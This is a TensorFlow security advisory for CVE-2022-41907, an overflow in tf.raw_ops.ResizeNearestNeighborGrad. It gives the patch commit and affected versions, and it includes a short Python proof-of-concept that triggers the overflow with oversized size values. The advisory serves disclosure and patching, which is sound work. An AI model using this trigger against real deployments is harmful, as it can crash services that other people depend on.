## TFSA-2022-149: Overflow in `ResizeNearestNeighborGrad`

### CVE Number
CVE-2022-41907

### Impact
When [`tf.raw_ops.ResizeNearestNeighborGrad`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/kernels/image/resize_nearest_neighbor_op.cc) is given a large `size` input, it overflows.
```
import tensorflow as tf

align_corners = True
half_pixel_centers = False
grads = tf.constant(1, shape=[1,8,16,3], dtype=tf.float16)
size = tf.constant([1879048192,1879048192], shape=[2], dtype=tf.int32)
tf.raw_ops.ResizeNearestNeighborGrad(grads=grads, size=size, align_corners=align_corners, half_pixel_centers=half_pixel_centers)
```

### Patches
We have patched the issue in GitHub commit [00c821af032ba9e5f5fa3fe14690c8d28a657624](https://github.com/tensorflow/tensorflow/commit/00c821af032ba9e5f5fa3fe14690c8d28a657624).

The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This vulnerability has been reported by Neophytos Christou from the Secure Systems Lab (SSL) at Brown University.
